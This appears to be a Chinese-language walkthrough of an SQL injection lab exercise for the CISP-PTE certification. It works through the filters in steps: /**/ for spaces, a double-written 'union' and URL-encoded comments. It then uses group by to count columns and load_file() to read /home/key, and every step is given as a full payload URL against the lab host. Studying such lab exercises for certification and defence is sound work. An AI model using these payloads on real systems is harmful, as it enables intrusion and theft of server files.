靶场获取
hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场
SQL注入题型一
1.审题
通过审题得知题目要求通过SQL注入漏洞读取网站/home/key文件,首先想到SQL语句“load_file()”
点击进入答题,尝试get请求参数id=1
2.确认注入点
单引号显示报错
3.尝试闭合
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1%23
通过提示发现#、–、空格等均被过滤,符号尝试url编码绕过,空格通过/**/可绕过。
4.确认字段数
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/4%23
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=1/**/group/**/by/**/5%23
group by 4正常回显
group by 5回显报错
由此确认当前表的字段数为4
5.确认回显位置
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,3,4%23
重点在于过滤了union,使用双写即可绕过。
6.注入获取key
审题时的事key在/home下,直接带入sql语句查询即可。
http://maobasix.cn:20001/vulnerabilities/fu1.php?id=1')/**/and/**/1=2/**/uniunionon/**/select/**/1,2,load_file('/home/key'),4%23